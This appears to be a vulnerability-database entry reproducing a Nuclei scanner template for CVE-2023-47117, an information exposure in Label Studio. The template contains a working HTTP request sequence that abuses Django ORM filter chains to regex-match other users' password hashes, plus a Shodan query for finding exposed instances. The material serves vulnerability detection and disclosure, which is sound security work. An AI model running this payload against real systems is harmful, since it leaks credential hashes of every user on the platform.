Label Studio - Sensitive Information Exposure

2024-07-0811:49:10

ProjectDiscovery

github.com

label studio

sensitive information exposure

django orm

filter chain

query manipulation

cve2023

oss

authenticated

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

6.5

Confidence

Low

EPSS

0.119

Percentile

95.4%

JSON

An attacker can construct a filter chain to filter tasks based on sensitive fields for all user accounts on the platform by exploiting Django's Object Relational Mapper (ORM). Since the results of query can be manipulated by the ORM filter, an attacker can leak these sensitive fields character by character.

id: CVE-2023-47117

info:
  name: Label Studio - Sensitive Information Exposure
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    An attacker can construct a filter chain to filter tasks based on sensitive fields for all user accounts on the platform by exploiting Django's Object Relational Mapper (ORM). Since the results of query can be manipulated by the ORM filter, an attacker can leak these sensitive fields character by character.
  reference:
    - https://security.snyk.io/vuln/SNYK-PYTHON-LABELSTUDIO-6056277
    - https://nvd.nist.gov/vuln/detail/CVE-2023-47117
    - https://github.com/elttam/publications
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-47117
    cwe-id: CWE-200
    epss-score: 0.0009
    epss-percentile: 0.38398
    cpe: cpe:2.3:a:humansignal:label_studio:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: humansignal
    product: label_studio
    shodan-query: http.favicon.hash:-1649949475
  tags: cve,cve2023,label_studio,oss,exposure,authenticated

variables:
  Task_id: "{{task}}"
  Project_id: "{{project}}"

http:
  - raw:
      - |
        GET /user/login/ HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /user/login/?next=/projects/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        csrfmiddlewaretoken={{csrf}}&email={{username}}&password={{password}}&persist_session=on

      - |
        PATCH /api/dm/views/{{Task_id}}?interaction=filter&project={{Project_id}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"id":{{Task_id}},"data":{"title":"Tasks","ordering":[],"type":"list","target":"tasks","filters":{"conjunction":"or","items":[{"filter":"filter:tasks:updated_by__active_organization__active_users__password","operator":"regex","value":"^pbkdf2_sha256\\$260000\\$","type":"String"}]},"hiddenColumns":{"explore":[],"labeling":[]},"columnsWidth":{},"columnsDisplayType":{},"gridWidth":4,"search_text":null},"project":"{{Project_id}}"}

      - |
        GET /api/tasks?page=1&page_size=30&view={{Task_id}}&interaction=filter&project={{Project_id}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body_4, "completed_at", "file_upload", "annotators")'
          - 'status_code_3==200 && status_code_4==200'
          - 'contains(header_4, "application/json")'
        condition: and

    extractors:
      - type: regex
        part: body
        name: csrf
        group: 1
        regex:
          - 'me="csrfmiddlewaretoken" value="([a-zA-Z0-9]+)">'
        internal: true
# digest: 4a0a00473045022100efb2bff232c70a7681dabfdbe49a60c516fcd5f5e446af96976aa8295a59d6b20220612431a6a43f670e2023f79605bdb673f619d459e4d74126b8bfc430ff91f9af:922c64590222798bb761d5b6d8e72950